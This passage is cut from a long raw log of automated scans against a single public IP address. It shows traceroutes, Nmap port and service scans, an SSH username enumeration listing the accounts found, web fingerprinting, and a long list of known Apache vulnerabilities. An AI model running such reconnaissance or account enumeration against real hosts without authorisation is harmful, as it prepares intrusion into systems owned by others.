11707HOP RTT ADDRESS
117081 133.37 ms 10.245.200.1
117092 ...
117103 134.18 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
117114 134.13 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
117125 139.39 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
117136 161.59 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
117147 166.21 ms be2798.ccr42.fra03.atlas.cogentco.com (154.54.58.229)
117158 166.16 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
117169 169.57 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1171710 161.78 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1171811 252.54 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1171912 253.87 ms 204.70.192.125
1172013 250.08 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1172114 256.44 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1172215 250.63 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1172316 254.52 ms 64.89.38.2
1172417 252.80 ms 192.252.144.58
11725#######################################################################################################################################
11726WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
11727Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 07:58 EST
11728Nmap scan report for 192.252.144.58
11729Host is up (0.24s latency).
11730Not shown: 482 filtered ports, 3 closed ports
11731Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
11732PORT STATE SERVICE
1173321/tcp open ftp
1173422/tcp open ssh
1173580/tcp open http
11736110/tcp open pop3
11737143/tcp open imap
11738443/tcp open https
11739465/tcp open smtps
11740587/tcp open submission
11741993/tcp open imaps
11742995/tcp open pop3s
117433306/tcp open mysql
11744
11745Nmap done: 1 IP address (1 host up) scanned in 234.78 seconds
11746#######################################################################################################################################
11747Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:01 EST
11748Nmap scan report for 192.252.144.58
11749Host is up (0.15s latency).
11750Not shown: 2 filtered ports, 1 closed port
11751PORT STATE SERVICE
1175253/udp open|filtered domain
1175367/udp open|filtered dhcps
1175468/udp open|filtered dhcpc
1175569/udp open|filtered tftp
1175688/udp open|filtered kerberos-sec
11757123/udp open|filtered ntp
11758139/udp open|filtered netbios-ssn
11759161/udp open|filtered snmp
11760162/udp open|filtered snmptrap
11761389/udp open|filtered ldap
11762500/udp open|filtered isakmp
11763520/udp open|filtered route
11764
11765Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
11766#######################################################################################################################################
11767Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:01 EST
11768Nmap scan report for 192.252.144.58
11769Host is up (0.26s latency).
11770
11771PORT STATE SERVICE VERSION
1177221/tcp filtered ftp
11773Too many fingerprints match this host to give specific OS details
11774Network Distance: 17 hops
11775
11776TRACEROUTE (using proto 1/icmp)
11777HOP RTT ADDRESS
117781 133.52 ms 10.245.200.1
117792 ...
117803 130.90 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
117814 130.54 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
117825 136.14 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
117836 158.12 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
117847 166.20 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
117858 162.74 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
117869 166.15 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1178710 162.53 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1178811 254.11 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1178912 257.76 ms 204.70.192.125
1179013 250.40 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1179114 259.08 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1179215 251.31 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1179316 255.26 ms 64.89.38.2
1179417 258.77 ms 192.252.144.58
11795#######################################################################################################################################
11796Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:03 EST
11797Nmap scan report for 192.252.144.58
11798Host is up (0.26s latency).
11799
11800PORT STATE SERVICE VERSION
1180122/tcp filtered ssh
11802Too many fingerprints match this host to give specific OS details
11803Network Distance: 17 hops
11804
11805TRACEROUTE (using proto 1/icmp)
11806HOP RTT ADDRESS
118071 138.47 ms 10.245.200.1
118082 ...
118093 132.18 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
118104 134.43 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
118115 140.71 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
118126 158.09 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
118137 166.10 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
118148 162.68 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
118159 165.89 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1181610 162.56 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1181711 259.17 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1181812 260.35 ms 204.70.192.125
1181913 252.78 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1182014 258.37 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1182115 251.61 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1182216 254.76 ms 64.89.38.2
1182317 258.32 ms 192.252.144.58
11824#######################################################################################################################################
11825USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
11826RHOSTS => 192.252.144.58
11827RHOST => 192.252.144.58
11828[*] 192.252.144.58:22 - SSH - Using malformed packet technique
11829[*] 192.252.144.58:22 - SSH - Starting scan
11830[+] 192.252.144.58:22 - SSH - User 'admin' found
11831[+] 192.252.144.58:22 - SSH - User 'administrator' found
11832[-] 192.252.144.58:22 - SSH - User 'anonymous' on could not connect
11833[+] 192.252.144.58:22 - SSH - User 'backup' found
11834[+] 192.252.144.58:22 - SSH - User 'bee' found
11835[+] 192.252.144.58:22 - SSH - User 'ftp' found
11836[+] 192.252.144.58:22 - SSH - User 'guest' found
11837[-] 192.252.144.58:22 - SSH - User 'GUEST' on could not connect
11838[+] 192.252.144.58:22 - SSH - User 'info' found
11839[-] 192.252.144.58:22 - SSH - User 'mail' on could not connect
11840[+] 192.252.144.58:22 - SSH - User 'mailadmin' found
11841[-] 192.252.144.58:22 - SSH - User 'msfadmin' on could not connect
11842[-] 192.252.144.58:22 - SSH - User 'mysql' on could not connect
11843[+] 192.252.144.58:22 - SSH - User 'nobody' found
11844[-] 192.252.144.58:22 - SSH - User 'oracle' on could not connect
11845[+] 192.252.144.58:22 - SSH - User 'owaspbwa' found
11846[-] 192.252.144.58:22 - SSH - User 'postfix' on could not connect
11847[+] 192.252.144.58:22 - SSH - User 'postgres' found
11848[-] 192.252.144.58:22 - SSH - User 'private' on could not connect
11849[+] 192.252.144.58:22 - SSH - User 'proftpd' found
11850[-] 192.252.144.58:22 - SSH - User 'public' on could not connect
11851[+] 192.252.144.58:22 - SSH - User 'root' found
11852[-] 192.252.144.58:22 - SSH - User 'superadmin' on could not connect
11853[+] 192.252.144.58:22 - SSH - User 'support' found
11854[-] 192.252.144.58:22 - SSH - User 'sys' on could not connect
11855[+] 192.252.144.58:22 - SSH - User 'system' found
11856[-] 192.252.144.58:22 - SSH - User 'systemadmin' on could not connect
11857[+] 192.252.144.58:22 - SSH - User 'systemadministrator' found
11858[-] 192.252.144.58:22 - SSH - User 'test' on could not connect
11859[+] 192.252.144.58:22 - SSH - User 'tomcat' found
11860[-] 192.252.144.58:22 - SSH - User 'user' on could not connect
11861[-] 192.252.144.58:22 - SSH - User 'webmaster' on could not connect
11862[-] 192.252.144.58:22 - SSH - User 'www-data' on could not connect
11863[-] 192.252.144.58:22 - SSH - User 'Fortimanager_Access' on could not connect
11864[*] Scanned 1 of 1 hosts (100% complete)
11865[*] Auxiliary module execution completed
11866#######################################################################################################################################
11867HTTP/1.1 403 Forbidden
11868Date: Mon, 25 Nov 2019 13:17:32 GMT
11869Server: Apache
11870Upgrade: h2
11871Connection: Upgrade
11872Accept-Ranges: bytes
11873Content-Type: text/html
11874
11875Allow: GET,POST,OPTIONS,HEAD
11876#######################################################################################################################################
11877
11878wig - WebApp Information Gatherer
11879
11880
11881Scanning http://192.252.144.58...
11882___________________________________________ SITE INFO ___________________________________________
11883IP Title
11884192.252.144.58 Resource not found
11885
11886____________________________________________ VERSION ____________________________________________
11887Name Versions Type
11888Apache 2.0.19 | 2.0.20 | 2.0.21 | 2.0.22 | 2.0.23 | 2.0.24 | 2.0.25 Platform
11889 2.0.26 | 2.0.27 | 2.0.28 | 2.0.29 | 2.0.30 | 2.0.31 | 2.0.32
11890 2.0.33 | 2.0.34 | 2.0.35 | 2.0.36 | 2.0.37 | 2.0.38 | 2.0.39
11891 2.0.40 | 2.0.41 | 2.0.42 | 2.0.43 | 2.0.44 | 2.0.45 | 2.0.46
11892 2.0.47 | 2.0.48 | 2.0.49 | 2.0.50 | 2.0.51 | 2.0.52 | 2.0.53
11893 2.0.54 | 2.0.55 | 2.0.56 | 2.0.57 | 2.0.58 | 2.0.59 | 2.0.60
11894 2.1.1 | 2.1.10 | 2.1.2 | 2.1.3 | 2.1.4 | 2.1.5 | 2.1.6
11895 2.1.7 | 2.1.8 | 2.1.9 | 2.2.0 | 2.2.1 | 2.2.2 | 2.2.3
11896 2.2.4 | 2.2.5
11897
11898_________________________________________________________________________________________________
11899Time: 36.7 sec Urls: 600 Fingerprints: 40401
11900#######################################################################################################################################
11901Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:18 EST
11902NSE: Loaded 163 scripts for scanning.
11903NSE: Script Pre-scanning.
11904Initiating NSE at 08:18
11905Completed NSE at 08:18, 0.00s elapsed
11906Initiating NSE at 08:18
11907Completed NSE at 08:18, 0.00s elapsed
11908Initiating Parallel DNS resolution of 1 host. at 08:18
11909Completed Parallel DNS resolution of 1 host. at 08:18, 0.05s elapsed
11910Initiating SYN Stealth Scan at 08:18
11911Scanning 192.252.144.58 [1 port]
11912Discovered open port 80/tcp on 192.252.144.58
11913Completed SYN Stealth Scan at 08:18, 0.30s elapsed (1 total ports)
11914Initiating Service scan at 08:18
11915Scanning 1 service on 192.252.144.58
11916Completed Service scan at 08:18, 6.51s elapsed (1 service on 1 host)
11917Initiating OS detection (try #1) against 192.252.144.58
11918Retrying OS detection (try #2) against 192.252.144.58
11919Initiating Traceroute at 08:18
11920Completed Traceroute at 08:18, 3.00s elapsed
11921Initiating Parallel DNS resolution of 16 hosts. at 08:18
11922Completed Parallel DNS resolution of 16 hosts. at 08:18, 0.29s elapsed
11923NSE: Script scanning 192.252.144.58.
11924Initiating NSE at 08:18
11925Completed NSE at 08:19, 53.52s elapsed
11926Initiating NSE at 08:19
11927Completed NSE at 08:19, 1.04s elapsed
11928Nmap scan report for 192.252.144.58
11929Host is up (0.25s latency).
11930
11931PORT STATE SERVICE VERSION
1193280/tcp open http Apache httpd
11933| http-brute:
11934|_ Path "/" does not require authentication
11935|_http-chrono: Request times for /; avg: 603.36ms; min: 570.49ms; max: 626.80ms
11936|_http-csrf: Couldn't find any CSRF vulnerabilities.
11937|_http-date: Mon, 25 Nov 2019 13:18:45 GMT; 0s from local time.
11938|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
11939|_http-dombased-xss: Couldn't find any DOM based XSS.
11940|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
11941| http-errors:
11942| Spidering limited to: maxpagecount=40; withinhost=192.252.144.58
11943| Found the following error pages:
11944|
11945| Error Code: 403
11946|_ http://192.252.144.58:80/
11947|_http-feed: Couldn't find any feeds.
11948|_http-fetch: Please enter the complete path of the directory to save data in.
11949| http-grep:
11950| (1) http://192.252.144.58:80/:
11951| (1) ip:
11952|_ + 192.252.144.58
11953| http-headers:
11954| Date: Mon, 25 Nov 2019 13:18:53 GMT
11955| Server: Apache
11956| Upgrade: h2
11957| Connection: Upgrade, close
11958| Accept-Ranges: bytes
11959| Transfer-Encoding: chunked
11960| Content-Type: text/html
11961|
11962|_ (Request type: GET)
11963|_http-jsonp-detection: Couldn't find any JSONP endpoints.
11964| http-methods:
11965|_ Supported Methods: GET POST OPTIONS HEAD
11966|_http-mobileversion-checker: No mobile version detected.
11967|_http-security-headers:
11968|_http-server-header: Apache
11969| http-sitemap-generator:
11970| Directory structure:
11971| /icons/expired/
11972| css: 1
11973| Longest directory structure:
11974| Depth: 2
11975| Dir: /icons/expired/
11976| Total files found (by extension):
11977|_ css: 1
11978|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
11979|_http-title: Resource not found
11980| http-vhosts:
11981|_127 names had status 403
11982|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
11983|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
11984|_http-xssed: No previously reported XSS vuln.
11985| vulscan: VulDB - https://vuldb.com:
11986| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
11987| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
11988| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
11989| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
11990| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
11991| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
11992| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
11993| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
11994| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
11995| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
11996| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
11997| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
11998| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
11999| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
12000| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
12001| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
12002| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
12003| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
12004| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
12005| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
12006| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
12007| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
12008| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
12009| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
12010| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
12011| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
12012| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
12013| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
12014| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
12015| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
12016| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
12017| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
12018| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12019| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12020| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
12021| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12022| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
12023| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
12024| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
12025| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
12026| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12027| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12028| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
12029| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
12030| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
12031| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12032| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12033| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
12034| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
12035| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12036| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12037| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
12038| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
12039| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
12040| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
12041| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
12042| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
12043| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
12044| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
12045| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
12046| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
12047| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12048| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12049| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
12050| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
12051| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12052| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
12053| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
12054| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
12055| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
12056| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
12057| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
12058| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
12059| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
12060| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
12061| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
12062| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
12063| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
12064| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
12065| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
12066| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
12067| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
12068| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
12069| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
12070| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
12071| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
12072| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
12073| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
12074| [136370] Apache Fineract up to 1.2.x sql injection
12075| [136369] Apache Fineract up to 1.2.x sql injection
12076| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
12077| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
12078| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
12079| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
12080| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
12081| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
12082| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
12083| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
12084| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
12085| [134416] Apache Sanselan 0.97-incubator Loop denial of service
12086| [134415] Apache Sanselan 0.97-incubator Hang denial of service
12087| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
12088| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
12089| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12090| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12091| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
12092| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
12093| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
12094| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
12095| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
12096| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
12097| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
12098| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
12099| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
12100| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
12101| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
12102| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
12103| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
12104| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
12105| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
12106| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
12107| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
12108| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
12109| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
12110| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
12111| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
12112| [131859] Apache Hadoop up to 2.9.1 privilege escalation
12113| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
12114| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
12115| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
12116| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
12117| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
12118| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
12119| [130629] Apache Guacamole Cookie Flag weak encryption
12120| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
12121| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
12122| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
12123| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
12124| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
12125| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
12126| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
12127| [130123] Apache Airflow up to 1.8.2 information disclosure
12128| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
12129| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
12130| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
12131| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
12132| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12133| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12134| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12135| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
12136| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
12137| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
12138| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
12139| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
12140| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12141| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
12142| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
12143| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
12144| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
12145| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
12146| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12147| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
12148| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12149| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
12150| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
12151| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
12152| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
12153| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
12154| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
12155| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
12156| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
12157| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
12158| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
12159| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
12160| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
12161| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
12162| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
12163| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
12164| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
12165| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
12166| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
12167| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
